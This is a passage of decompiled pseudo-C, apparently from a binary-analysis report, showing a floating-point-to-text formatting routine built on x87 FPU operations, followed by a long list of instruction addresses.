								asm("fnstsw ax");
							} while ((_t210 & 0x00000041) == 0);
							 *(_t373 + 0x3c) = _t319;
						}
					}
					if(_t346 != 2) {
						L41:
						__eflags = _t290 - 1;
						if(_t290 != 1) {
							st0 = _t395;
						} else {
							st3 = _t395;
						}
						goto L44;
					} else {
						if(_t366 == 0) {
							_t366 = _t346 - 1;
						}
						if(_t290 != 0) {
							_t366 = _t366 - 1;
							__eflags = _t366;
							goto L41;
						} else {
							st0 = _t395;
							_t210 = (_t210 | 0xffffffff) - _t319;
							_t366 = _t366 + _t210;
							if(_t366 >= 0) {
								L44:
								_t394 = st2;
								asm("fxch st0, st4");
								asm("fcomp st0, st3");
								asm("fnstsw ax");
								__eflags = _t210 & 0x00000041;
								if((_t210 & 0x00000041) != 0) {
									st2 = _t394;
								} else {
									st3 = _t394;
									asm("fxch st0, st1");
									asm("fchs");
									asm("fxch st0, st2");
									asm("fxch st0, st1");
								}
								_t395 =  *0xc81ce8;
								asm("fcomp st0, st3");
								asm("fnstsw ax");
								__eflags = _t210 & 0x00000005;
								if((_t210 & 0x00000005) != 0) {
									goto L34;
								} else {
									asm("fnstcw word [esp+0x10]");
									__eflags = _t366 - 9;
									 *(_t373 + 0x34) =  *(_t373 + 0x10) & 0x0000ffff | 0x00000c00;
									asm("fldcw word [esp+0x34]");
									asm("fistp qword [esp+0x34]");
									_t348 =  *(_t373 + 0x34);
									asm("fldcw word [esp+0x10]");
									if(_t366 > 9) {
										_t366 = 9;
									}
									_t215 = _t366;
									_t397 = st1;
									__eflags = _t366;
									if(_t366 != 0) {
										do {
											_t215 = _t215 - 1;
											__eflags = _t215;
											_t397 = _t397 * st1;
										} while (_t215 != 0);
									}
									_t216 = E00C6CCF0(_t215, st0);
									_t333 = _t216;
									 *(_t373 + 0x34) = _t333;
									asm("fisub dword [esp+0x34]");
									_t399 =  *0xc81bf8;
									asm("fcom st0, st1");
									asm("fnstsw ax");
									st1 = _t399;
									__eflags = _t216 & 0x00000041;
									if((_t216 & 0x00000041) == 0) {
										_t333 = _t333 + 1;
										__eflags = _t333;
									}
									_t217 = _t366;
									__eflags = _t366;
									if(_t366 != 0) {
										while(1) {
											_t217 = _t217 - 1;
											__eflags = _t217;
											asm("fxch st0, st2");
											_t399 = _t399 * st1;
											if(_t217 == 0) {
												break;
											}
											asm("fxch st0, st2");
										}
										st1 = _t399;
										asm("fxch st0, st1");
									} else {
										st1 = _t399;
									}
									_t293 = _t348;
									 *(_t373 + 0x34) = _t293;
									asm("fild dword [esp+0x34]");
									__eflags = _t293;
									if(_t293 < 0) {
									}
									asm("fsubp st3, st0");
									asm("fxch st0, st2");
									asm("fmulp st1, st0");
									_t218 = E00C6CCF0(_t217, st0);
									_t294 = _t218;
									 *(_t373 + 0x34) = _t294;
									asm("fisub dword [esp+0x34]");
									asm("fcompp");
									asm("fnstsw ax");
									__eflags = _t218 & 0x00000001;
									if((_t218 & 0x00000001) == 0) {
										_t294 = _t294 + 1;
										__eflags = _t294;
									}
									__eflags = _t294 - _t333;
									if(_t294 >= _t333) {
										_t348 = _t348 + 1;
										_t294 = _t294 - _t333;
										__eflags = _t294;
									}
									while(1) {
										_t321 = 0xcccccccd * _t348 >> 0x20 >> 3;
										_t350 =  *(_t373 + 0x24);
										 *((char*)(_t373 + _t350 + 0x40)) =  *((intOrPtr*)(_t348 - _t321 + _t321 * 4 + _t321 + _t321 * 4 + "0123456789"));
										_t225 = _t350 + 1;
										_t348 = _t321;
										 *(_t373 + 0x24) = _t225;
										__eflags = _t348;
										if(_t348 == 0) {
											break;
										}
										__eflags = _t225 - 0x14;
										if(_t225 < 0x14) {
											continue;
										}
										break;
									}
									__eflags = _t225 - 0x14;
									if(_t225 == 0x14) {
										_t225 = 0x13;
										 *(_t373 + 0x24) = 0x13;
									}
									_t334 =  *(_t373 + 0x28);
									 *((char*)(_t373 + _t225 + 0x40)) = 0;
									__eflags = _t366;
									if(_t366 > 0) {
										while(1) {
											L71:
											__eflags =  *((intOrPtr*)(_t373 + 0xa0)) - 2;
											if( *((intOrPtr*)(_t373 + 0xa0)) != 2) {
												break;
											}
											__eflags = _t334;
											if(_t334 != 0) {
												break;
											} else {
												_t329 = 0xcccccccd * _t294 >> 0x20 >> 3;
												_t280 = _t329 + _t329 * 4;
												__eflags = _t294 != _t329 + _t329 * 4 + _t280;
												if(_t294 != _t329 + _t329 * 4 + _t280) {
													break;
												} else {
													_t366 = _t366 - 1;
													_t294 = _t329;
													__eflags = _t366;
													if(_t366 > 0) {
														continue;
													} else {
														L79:
														 *(_t373 + 0x28) = _t334;
													}
												}
											}
											goto L80;
										}
										_t327 = 0xcccccccd * _t294 >> 0x20 >> 3;
										_t93 = _t294 - _t327 + _t327 * 4 + _t327 + _t327 * 4 + "0123456789"; // 0x33323130
										 *((char*)(_t373 + _t334 + 0x54)) =  *_t93;
										_t334 = _t334 + 1;
										__eflags = _t334 - _t366;
										_t294 = _t327;
										if(_t334 < _t366) {
											goto L71;
										} else {
											 *(_t373 + 0x28) = _t334;
											__eflags = _t334 - 0x14;
											if(_t334 == 0x14) {
												_t334 = 0x13;
												goto L79;
											}
										}
									}
									L80:
									__eflags =  *(_t373 + 0x30) - 1;
									 *((char*)(_t373 + _t334 + 0x54)) = 0;
									if( *(_t373 + 0x30) != 1) {
										_t351 =  *(_t373 + 0x20);
										goto L90;
									} else {
										_t311 =  *(_t373 + 0x3c);
										__eflags = _t311;
										if(_t311 < 0) {
											_t311 =  ~_t311;
										}
										_t361 =  *(_t373 + 0x20);
										while(1) {
											_t271 = (0x66666667 * _t311 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t311 >> 0x20 >> 2);
											_t324 = _t271 + _t271 * 4;
											_t325 = _t271 + _t271 * 4 + _t324;
											 *((char*)(_t373 + _t361 + 0x68)) =  *((intOrPtr*)(_t311 - _t271 + _t271 * 4 + _t324 + "0123456789"));
											_t311 = _t271;
											_t351 = _t361 + 1;
											__eflags = _t311;
											if(_t311 <= 0) {
												break;
											}
											__eflags = _t351 - 0x14;
											if(_t351 < 0x14) {
												continue;
											} else {
												_pop(_t344);
												_pop(_t362);
												_pop(_t288);
												__eflags =  *(_t373 + 0x6c) ^ _t373;
												return E00C69C26(0, _t288,  *(_t373 + 0x6c) ^ _t373, _t325, _t344, _t362);
											}
											goto L144;
										}
										 *(_t373 + 0x20) = _t351;
										__eflags = _t351 - 1;
										if(_t351 == 1) {
											_t351 = 2;
											 *((char*)(_t373 + 0x69)) = 0x30;
											 *(_t373 + 0x20) = 2;
										}
										L90:
										_t319 =  *(_t373 + 0x2c);
										_t319 = _t366;
										_t230 =  *((intOrPtr*)(_t373 + 0x94)) - (0 | _t319 != 0x00000000) - (0 | _t366 > 0x00000000) -  *(_t373 + 0x24) - _t366;
										__eflags =  *(_t373 + 0x30) - 1;
										 *(_t373 + 0x10) = _t230;
										if( *(_t373 + 0x30) == 1) {
											_t230 = _t230 + 0xfffffffe - _t351;
											__eflags = _t230;
											 *(_t373 + 0x10) = _t230;
										}
										_t300 = _t366 - _t334;
										__eflags = _t300;
										 *(_t373 + 0x34) = _t300;
										if(_t300 < 0) {
											 *(_t373 + 0x34) = 0;
										}
										__eflags = _t230;
										if(_t230 < 0) {
											_t230 = 0;
											__eflags = 0;
											 *(_t373 + 0x10) = 0;
										}
										_t301 =  *(_t373 + 0x9c);
										__eflags = _t301 & 0x00000001;
										if((_t301 & 0x00000001) != 0) {
											_t230 =  ~_t230;
											 *(_t373 + 0x10) = _t230;
										}
										__eflags = _t301 & 0x00000010;
										if((_t301 & 0x00000010) == 0) {
											__eflags = _t230;
											if(_t230 <= 0) {
												goto L110;
											} else {
												while(1) {
													_t319 =  *(_t373 + 0x1c);
													_t259 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x20);
													_t373 = _t373 + 8;
													__eflags = _t259;
													if(_t259 == 0) {
														goto L35;
													}
													_t261 =  *(_t373 + 0x10) - 1;
													 *(_t373 + 0x10) = _t261;
													__eflags = _t261;
													if(_t261 > 0) {
														continue;
													} else {
														goto L110;
													}
													goto L144;
												}
												goto L35;
											}
										} else {
											__eflags = _t230;
											if(_t230 <= 0) {
												L110:
												__eflags =  *(_t373 + 0x2c);
												if( *(_t373 + 0x2c) == 0) {
													L112:
													__eflags =  *(_t373 + 0x24);
													if( *(_t373 + 0x24) <= 0) {
														L116:
														__eflags = _t366;
														if(_t366 > 0) {
															L118:
															_t368 =  *(_t373 + 0x1c);
															_t352 =  *((intOrPtr*)(_t373 + 0x18));
															_t335 =  *(_t373 + 0x14);
															_t231 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x2e);
															_t373 = _t373 + 8;
															__eflags = _t231;
															if(_t231 == 0) {
																goto L35;
															} else {
																__eflags =  *(_t373 + 0x28);
																if( *(_t373 + 0x28) <= 0) {
																	goto L125;
																} else {
																	while(1) {
																		 *(_t373 + 0x30) =  *(_t373 + 0x28) - 1;
																		_t252 = E00BA7DE0(_t284, _t335, _t352, _t368,  *((char*)(_t373 +  *(_t373 + 0x28) + 0x53)));
																		_t373 = _t373 + 8;
																		__eflags = _t252;
																		if(_t252 == 0) {
																			goto L35;
																		}
																		__eflags =  *(_t373 + 0x28);
																		if( *(_t373 + 0x28) > 0) {
																			continue;
																		} else {
																			goto L125;
																		}
																		goto L144;
																	}
																	goto L35;
																}
															}
														} else {
															__eflags =  *(_t373 + 0x9c) & 0x00000008;
															if(( *(_t373 + 0x9c) & 0x00000008) == 0) {
																_t335 =  *(_t373 + 0x14);
																_t352 =  *((intOrPtr*)(_t373 + 0x18));
																_t368 =  *(_t373 + 0x1c);
																L125:
																__eflags =  *(_t373 + 0x34);
																if( *(_t373 + 0x34) <= 0) {
																	L129:
																	__eflags =  *(_t373 + 0x30) - 1;
																	if( *(_t373 + 0x30) != 1) {
																		L139:
																		__eflags =  *(_t373 + 0x10);
																		if( *(_t373 + 0x10) >= 0) {
																			L143:
																			_pop(_t336);
																			_pop(_t353);
																			_pop(_t286);
																			__eflags =  *(_t373 + 0x7c) ^ _t373;
																			return E00C69C26(1, _t286,  *(_t373 + 0x7c) ^ _t373, _t319, _t336, _t353);
																		} else {
																			_t337 =  *(_t373 + 0x14);
																			_t354 =  *((intOrPtr*)(_t373 + 0x18));
																			_t370 =  *(_t373 + 0x1c);
																			while(1) {
																				_t234 = E00BA7DE0(_t284, _t337, _t354, _t370, 0x20);
																				_t373 = _t373 + 8;
																				__eflags = _t234;
																				if(_t234 == 0) {
																					goto L35;
																				}
																				_t203 = _t373 + 0x10;
																				 *_t203 =  *(_t373 + 0x10) + 1;
																				__eflags =  *_t203;
																				if( *_t203 < 0) {
																					continue;
																				} else {
																					goto L143;
																				}
																				goto L144;
																			}
																			goto L35;
																		}
																	} else {
																		_t319 =  !( *(_t373 + 0x9c)) & 0x00000020 | 0x00000045;
																		_t239 = E00BA7DE0(_t284, _t335, _t352, _t368,  !( *(_t373 + 0x9c)) & 0x00000020 | 0x00000045);
																		_t373 = _t373 + 8;
																		__eflags = _t239;
																		if(_t239 == 0) {
																			goto L35;
																		} else {
																			__eflags =  *(_t373 + 0x3c);
																			if( *(_t373 + 0x3c) >= 0) {
																				_t240 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x2b);
																				_t373 = _t373 + 8;
																				__eflags = _t240;
																				if(_t240 == 0) {
																					goto L35;
																				} else {
																					goto L135;
																				}
																			} else {
																				_t245 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x2d);
																				_t373 = _t373 + 8;
																				__eflags = _t245;
																				if(_t245 != 0) {
																					L135:
																					__eflags =  *(_t373 + 0x20);
																					if( *(_t373 + 0x20) <= 0) {
																						goto L139;
																					} else {
																						while(1) {
																							 *(_t373 + 0x20) =  *(_t373 + 0x20) - 1;
																							_t244 = E00BA7DE0(_t284, _t335, _t352, _t368,  *((char*)(_t373 +  *(_t373 + 0x20) - 1 + 0x68)));
																							_t373 = _t373 + 8;
																							__eflags = _t244;
																							if(_t244 == 0) {
																								goto L35;
																							}
																							__eflags =  *(_t373 + 0x20);
																							if( *(_t373 + 0x20) > 0) {
																								continue;
																							} else {
																								goto L139;
																							}
																							goto L144;
																						}
																						goto L35;
																					}
																				} else {
																					_pop(_t338);
																					_pop(_t355);
																					_pop(_t287);
																					__eflags =  *(_t373 + 0x6c) ^ _t373;
																					return E00C69C26(_t245, _t287,  *(_t373 + 0x6c) ^ _t373, _t319, _t338, _t355);
																				}
																			}
																		}
																	}
																} else {
																	_t335 =  *(_t373 + 0x14);
																	_t352 =  *((intOrPtr*)(_t373 + 0x18));
																	_t368 =  *(_t373 + 0x1c);
																	while(1) {
																		_t247 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x30);
																		_t373 = _t373 + 8;
																		__eflags = _t247;
																		if(_t247 == 0) {
																			goto L35;
																		}
																		_t249 =  *(_t373 + 0x34) - 1;
																		 *(_t373 + 0x34) = _t249;
																		__eflags = _t249;
																		if(_t249 > 0) {
																			continue;
																		} else {
																			goto L129;
																		}
																		goto L144;
																	}
																	goto L35;
																}
															} else {
																goto L118;
															}
														}
													} else {
														while(1) {
															_t253 =  *(_t373 + 0x24);
															_t319 =  *((char*)(_t373 + _t253 + 0x3f));
															 *(_t373 + 0x24) = _t253 - 1;
															_t256 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *((char*)(_t373 + _t253 + 0x3f)));
															_t373 = _t373 + 8;
															__eflags = _t256;
															if(_t256 == 0) {
																goto L35;
															}
															__eflags =  *(_t373 + 0x24);
															if( *(_t373 + 0x24) > 0) {
																continue;
															} else {
																goto L116;
															}
															goto L144;
														}
														goto L35;
													}
												} else {
													_t258 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *(_t373 + 0x2c));
													_t373 = _t373 + 8;
													__eflags = _t258;
													if(_t258 == 0) {
														goto L35;
													} else {
														goto L112;
													}
												}
											} else {
												__eflags = _t319;
												if(_t319 == 0) {
													L103:
													__eflags = _t230;
													if(_t230 <= 0) {
														goto L110;
													} else {
														while(1) {
															_t262 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x30);
															_t373 = _t373 + 8;
															__eflags = _t262;
															if(_t262 == 0) {
																goto L35;
															}
															_t264 =  *(_t373 + 0x10) - 1;
															 *(_t373 + 0x10) = _t264;
															__eflags = _t264;
															if(_t264 > 0) {
																continue;
															} else {
																goto L110;
															}
															goto L144;
														}
														goto L35;
													}
												} else {
													_t319 =  *(_t373 + 0x2c);
													_t266 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *(_t373 + 0x2c));
													_t373 = _t373 + 8;
													__eflags = _t266;
													if(_t266 == 0) {
														goto L35;
													} else {
														_t140 = _t373 + 0x10;
														 *_t140 =  *(_t373 + 0x10) - 1;
														__eflags =  *_t140;
														_t230 =  *(_t373 + 0x10);
														 *(_t373 + 0x2c) = 0;
														goto L103;
													}
												}
											}
										}
									}
								}
							} else {
								st2 = _t395;
								L34:
								st0 = _t395;
								st1 = _t395;
								st0 = _t395;
								L35:
								_pop(_t332);
								_pop(_t347);
								_pop(_t285);
								return E00C69C26(0, _t285,  *(_t373 + 0x6c) ^ _t373, _t319, _t332, _t347);
							}
						}
					}
				}
				L144:
			}








































































                                                              0x00ba8345
                                                              0x00ba834a
                                                              0x00ba8351
                                                              0x00ba8355
                                                              0x00ba835a
                                                              0x00ba835f
                                                              0x00ba8367
                                                              0x00ba8371
                                                              0x00ba8375
                                                              0x00ba8379
                                                              0x00ba837d
                                                              0x00ba8381
                                                              0x00ba8385
                                                              0x00ba8389
                                                              0x00ba838d
                                                              0x00ba8391
                                                              0x00ba8395
                                                              0x00ba8397
                                                              0x00ba8397
                                                              0x00ba839a
                                                              0x00ba83a3
                                                              0x00ba83a5
                                                              0x00ba83aa
                                                              0x00ba83b6
                                                              0x00ba83bd
                                                              0x00ba83bf
                                                              0x00ba83cb
                                                              0x00ba83cd
                                                              0x00ba83cf
                                                              0x00ba83cf
                                                              0x00ba83c1
                                                              0x00ba83c1
                                                              0x00ba83c1
                                                              0x00ba83ac
                                                              0x00ba83ac
                                                              0x00ba83ac
                                                              0x00ba83dd
                                                              0x00ba83e2
                                                              0x00ba84ee
                                                              0x00ba84f0
                                                              0x00ba84f4
                                                              0x00ba84f6
                                                              0x00000000
                                                              0x00ba84f8
                                                              0x00000000
                                                              0x00ba84f8
                                                              0x00ba83e8
                                                              0x00ba83ea
                                                              0x00ba83ec
                                                              0x00ba83f1
                                                              0x00ba83f7
                                                              0x00ba83fd
                                                              0x00ba83ff
                                                              0x00ba8401
                                                              0x00ba8404
                                                              0x00ba840d
                                                              0x00ba840f
                                                              0x00ba8420
                                                              0x00ba84e5
                                                              0x00000000
                                                              0x00ba8426
                                                              0x00ba8426
                                                              0x00ba8429
                                                              0x00ba842b
                                                              0x00ba842d
                                                              0x00ba842f
                                                              0x00ba8434
                                                              0x00ba843b
                                                              0x00ba843e
                                                              0x00ba8440
                                                              0x00ba8442
                                                              0x00ba8444
                                                              0x00ba844c
                                                              0x00ba844e
                                                              0x00ba8450
                                                              0x00ba8452
                                                              0x00ba8455
                                                              0x00ba84e7
                                                              0x00ba84e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8455
                                                              0x00ba8411
                                                              0x00ba8411
                                                              0x00ba8413
                                                              0x00ba8415
                                                              0x00ba8417
                                                              0x00ba841a
                                                              0x00ba845b
                                                              0x00ba845b
                                                              0x00ba841c
                                                              0x00ba841c
                                                              0x00ba841c
                                                              0x00ba841a
                                                              0x00ba8460
                                                              0x00ba8406
                                                              0x00ba8406
                                                              0x00ba8406
                                                              0x00ba83f3
                                                              0x00ba83f3
                                                              0x00ba83f3
                                                              0x00ba8462
                                                              0x00ba8466
                                                              0x00ba8468
                                                              0x00ba846a
                                                              0x00ba846c
                                                              0x00ba8471
                                                              0x00ba8473
                                                              0x00ba8475
                                                              0x00ba8477
                                                              0x00ba847c
                                                              0x00ba847e
                                                              0x00ba847e
                                                              0x00ba8480
                                                              0x00ba8481
                                                              0x00ba8483
                                                              0x00ba8485
                                                              0x00ba8487
                                                              0x00ba8489
                                                              0x00ba848e
                                                              0x00ba848e
                                                              0x00ba8492
                                                              0x00ba8494
                                                              0x00ba8496
                                                              0x00ba849b
                                                              0x00ba849d
                                                              0x00ba849d
                                                              0x00ba849f
                                                              0x00ba84a0
                                                              0x00ba84a2
                                                              0x00ba84a4
                                                              0x00ba84a9
                                                              0x00ba84a9
                                                              0x00ba849b
                                                              0x00ba84b0
                                                              0x00ba84fe
                                                              0x00ba84fe
                                                              0x00ba8501
                                                              0x00ba8507
                                                              0x00ba8503
                                                              0x00ba8503
                                                              0x00ba8503
                                                              0x00000000
                                                              0x00ba84b2
                                                              0x00ba84b4
                                                              0x00ba84b6
                                                              0x00ba84b6
                                                              0x00ba84bb
                                                              0x00ba84fd
                                                              0x00ba84fd
                                                              0x00000000
                                                              0x00ba84bd
                                                              0x00ba84c0
                                                              0x00ba84c2
                                                              0x00ba84c4
                                                              0x00ba84c6
                                                              0x00ba8509
                                                              0x00ba8509
                                                              0x00ba850b
                                                              0x00ba850d
                                                              0x00ba850f
                                                              0x00ba8511
                                                              0x00ba8514
                                                              0x00ba859d
                                                              0x00ba851a
                                                              0x00ba851a
                                                              0x00ba851c
                                                              0x00ba851e
                                                              0x00ba8520
                                                              0x00ba8522
                                                              0x00ba8522
                                                              0x00ba8524
                                                              0x00ba852a
                                                              0x00ba852c
                                                              0x00ba852e
                                                              0x00ba8531
                                                              0x00000000
                                                              0x00ba8533
                                                              0x00ba8533
                                                              0x00ba8543
                                                              0x00ba8546
                                                              0x00ba854a
                                                              0x00ba854e
                                                              0x00ba8552
                                                              0x00ba8556
                                                              0x00ba855a
                                                              0x00ba855c
                                                              0x00ba855c
                                                              0x00ba8561
                                                              0x00ba8563
                                                              0x00ba8565
                                                              0x00ba8567
                                                              0x00ba8569
                                                              0x00ba8569
                                                              0x00ba8569
                                                              0x00ba856c
                                                              0x00ba856c
                                                              0x00ba8569
                                                              0x00ba8572
                                                              0x00ba8577
                                                              0x00ba8579
                                                              0x00ba857d
                                                              0x00ba8581
                                                              0x00ba8587
                                                              0x00ba8589
                                                              0x00ba858b
                                                              0x00ba858d
                                                              0x00ba8590
                                                              0x00ba8592
                                                              0x00ba8592
                                                              0x00ba8592
                                                              0x00ba8593
                                                              0x00ba8595
                                                              0x00ba8597
                                                              0x00ba85a3
                                                              0x00ba85a3
                                                              0x00ba85a3
                                                              0x00ba85a6
                                                              0x00ba85a8
                                                              0x00ba85aa
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba85a1
                                                              0x00ba85a1
                                                              0x00ba85ac
                                                              0x00ba85ae
                                                              0x00ba8599
                                                              0x00ba8599
                                                              0x00ba8599
                                                              0x00ba85b0
                                                              0x00ba85b2
                                                              0x00ba85b6
                                                              0x00ba85ba
                                                              0x00ba85bc
                                                              0x00ba85bc
                                                              0x00ba85c4
                                                              0x00ba85c6
                                                              0x00ba85c8
                                                              0x00ba85cc
                                                              0x00ba85d1
                                                              0x00ba85d3
                                                              0x00ba85d7
                                                              0x00ba85db
                                                              0x00ba85dd
                                                              0x00ba85df
                                                              0x00ba85e2
                                                              0x00ba85e4
                                                              0x00ba85e4
                                                              0x00ba85e4
                                                              0x00ba85e5
                                                              0x00ba85e7
                                                              0x00ba85e9
                                                              0x00ba85ea
                                                              0x00ba85ea
                                                              0x00ba85ea
                                                              0x00ba85f0
                                                              0x00ba85f7
                                                              0x00ba8607
                                                              0x00ba860b
                                                              0x00ba8611
                                                              0x00ba8612
                                                              0x00ba8614
                                                              0x00ba8618
                                                              0x00ba861a
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba861c
                                                              0x00ba861f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba861f
                                                              0x00ba8621
                                                              0x00ba8624
                                                              0x00ba8626
                                                              0x00ba862b
                                                              0x00ba862b
                                                              0x00ba862f
                                                              0x00ba8633
                                                              0x00ba8638
                                                              0x00ba863a
                                                              0x00ba8640
                                                              0x00ba8640
                                                              0x00ba8640
                                                              0x00ba8648
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba864a
                                                              0x00ba864c
                                                              0x00000000
                                                              0x00ba864e
                                                              0x00ba8655
                                                              0x00ba8658
                                                              0x00ba865f
                                                              0x00ba8661
                                                              0x00000000
                                                              0x00ba8663
                                                              0x00ba8663
                                                              0x00ba8664
                                                              0x00ba8666
                                                              0x00ba8668
                                                              0x00000000
                                                              0x00ba866a
                                                              0x00ba869c
                                                              0x00ba869c
                                                              0x00ba869c
                                                              0x00ba8668
                                                              0x00ba8661
                                                              0x00000000
                                                              0x00ba864c
                                                              0x00ba8673
                                                              0x00ba867d
                                                              0x00ba8683
                                                              0x00ba8687
                                                              0x00ba8688
                                                              0x00ba868a
                                                              0x00ba868c
                                                              0x00000000
                                                              0x00ba868e
                                                              0x00ba868e
                                                              0x00ba8692
                                                              0x00ba8695
                                                              0x00ba8697
                                                              0x00000000
                                                              0x00ba8697
                                                              0x00ba8695
                                                              0x00ba868c
                                                              0x00ba86a0
                                                              0x00ba86a0
                                                              0x00ba86a5
                                                              0x00ba86aa
                                                              0x00ba871c
                                                              0x00000000
                                                              0x00ba86ac
                                                              0x00ba86ac
                                                              0x00ba86b0
                                                              0x00ba86b2
                                                              0x00ba86b4
                                                              0x00ba86b4
                                                              0x00ba86b6
                                                              0x00ba86c0
                                                              0x00ba86cf
                                                              0x00ba86d1
                                                              0x00ba86d4
                                                              0x00ba86de
                                                              0x00ba86e2
                                                              0x00ba86e4
                                                              0x00ba86e5
                                                              0x00ba86e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba86e9
                                                              0x00ba86ec
                                                              0x00000000
                                                              0x00ba86ee
                                                              0x00ba86ee
                                                              0x00ba86ef
                                                              0x00ba86f3
                                                              0x00ba86f8
                                                              0x00ba8702
                                                              0x00ba8702
                                                              0x00000000
                                                              0x00ba86ec
                                                              0x00ba8703
                                                              0x00ba8707
                                                              0x00ba870a
                                                              0x00ba870c
                                                              0x00ba8711
                                                              0x00ba8716
                                                              0x00ba8716
                                                              0x00ba8720
                                                              0x00ba8720
                                                              0x00ba8736
                                                              0x00ba8741
                                                              0x00ba8743
                                                              0x00ba8748
                                                              0x00ba874c
                                                              0x00ba8755
                                                              0x00ba8755
                                                              0x00ba8757
                                                              0x00ba8757
                                                              0x00ba875d
                                                              0x00ba875d
                                                              0x00ba875f
                                                              0x00ba8763
                                                              0x00ba8765
                                                              0x00ba8765
                                                              0x00ba876d
                                                              0x00ba876f
                                                              0x00ba8771
                                                              0x00ba8771
                                                              0x00ba8773
                                                              0x00ba8773
                                                              0x00ba8777
                                                              0x00ba877e
                                                              0x00ba8781
                                                              0x00ba8783
                                                              0x00ba8785
                                                              0x00ba8785
                                                              0x00ba8789
                                                              0x00ba878c
                                                              0x00ba87fe
                                                              0x00ba8800
                                                              0x00000000
                                                              0x00ba8802
                                                              0x00ba8802
                                                              0x00ba8802
                                                              0x00ba8811
                                                              0x00ba8816
                                                              0x00ba8819
                                                              0x00ba881b
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8825
                                                              0x00ba8826
                                                              0x00ba882a
                                                              0x00ba882c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba882c
                                                              0x00000000
                                                              0x00ba8802
                                                              0x00ba878e
                                                              0x00ba878e
                                                              0x00ba8790
                                                              0x00ba882e
                                                              0x00ba882e
                                                              0x00ba8833
                                                              0x00ba8857
                                                              0x00ba8857
                                                              0x00ba885c
                                                              0x00ba8893
                                                              0x00ba8893
                                                              0x00ba8895
                                                              0x00ba88a1
                                                              0x00ba88a1
                                                              0x00ba88a5
                                                              0x00ba88a9
                                                              0x00ba88b0
                                                              0x00ba88b5
                                                              0x00ba88b8
                                                              0x00ba88ba
                                                              0x00000000
                                                              0x00ba88c0
                                                              0x00ba88c0
                                                              0x00ba88c5
                                                              0x00000000
                                                              0x00ba88c7
                                                              0x00ba88d0
                                                              0x00ba88dc
                                                              0x00ba88e0
                                                              0x00ba88e5
                                                              0x00ba88e8
                                                              0x00ba88ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba88f0
                                                              0x00ba88f5
                                                              0x00000000
                                                              0x00ba88f7
                                                              0x00000000
                                                              0x00ba88f7
                                                              0x00000000
                                                              0x00ba88f5
                                                              0x00000000
                                                              0x00ba88d0
                                                              0x00ba88c5
                                                              0x00ba8897
                                                              0x00ba8897
                                                              0x00ba889f
                                                              0x00ba88f9
                                                              0x00ba88fd
                                                              0x00ba8901
                                                              0x00ba8905
                                                              0x00ba8905
                                                              0x00ba890a
                                                              0x00ba8938
                                                              0x00ba8938
                                                              0x00ba893d
                                                              0x00ba89d7
                                                              0x00ba89d7
                                                              0x00ba89dc
                                                              0x00ba8a0a
                                                              0x00ba8a0e
                                                              0x00ba8a0f
                                                              0x00ba8a11
                                                              0x00ba8a12
                                                              0x00ba8a21
                                                              0x00ba89de
                                                              0x00ba89de
                                                              0x00ba89e2
                                                              0x00ba89e6
                                                              0x00ba89f0
                                                              0x00ba89f3
                                                              0x00ba89f8
                                                              0x00ba89fb
                                                              0x00ba89fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8a03
                                                              0x00ba8a03
                                                              0x00ba8a03
                                                              0x00ba8a08
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8a08
                                                              0x00000000
                                                              0x00ba89f0
                                                              0x00ba8943
                                                              0x00ba8950
                                                              0x00ba8955
                                                              0x00ba895a
                                                              0x00ba895d
                                                              0x00ba895f
                                                              0x00000000
                                                              0x00ba8965
                                                              0x00ba8965
                                                              0x00ba896a
                                                              0x00ba8991
                                                              0x00ba8996
                                                              0x00ba8999
                                                              0x00ba899b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba896c
                                                              0x00ba896f
                                                              0x00ba8974
                                                              0x00ba8977
                                                              0x00ba8979
                                                              0x00ba89a1
                                                              0x00ba89a1
                                                              0x00ba89a6
                                                              0x00000000
                                                              0x00ba89a8
                                                              0x00ba89b0
                                                              0x00ba89b5
                                                              0x00ba89c0
                                                              0x00ba89c5
                                                              0x00ba89c8
                                                              0x00ba89ca
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba89d0
                                                              0x00ba89d5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba89d5
                                                              0x00000000
                                                              0x00ba89b0
                                                              0x00ba897b
                                                              0x00ba897b
                                                              0x00ba897c
                                                              0x00ba897e
                                                              0x00ba8983
                                                              0x00ba898d
                                                              0x00ba898d
                                                              0x00ba8979
                                                              0x00ba896a
                                                              0x00ba895f
                                                              0x00ba890c
                                                              0x00ba890c
                                                              0x00ba8910
                                                              0x00ba8914
                                                              0x00ba8918
                                                              0x00ba891b
                                                              0x00ba8920
                                                              0x00ba8923
                                                              0x00ba8925
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba892f
                                                              0x00ba8930
                                                              0x00ba8934
                                                              0x00ba8936
                                                              0x00000000
                                                              0x00000000
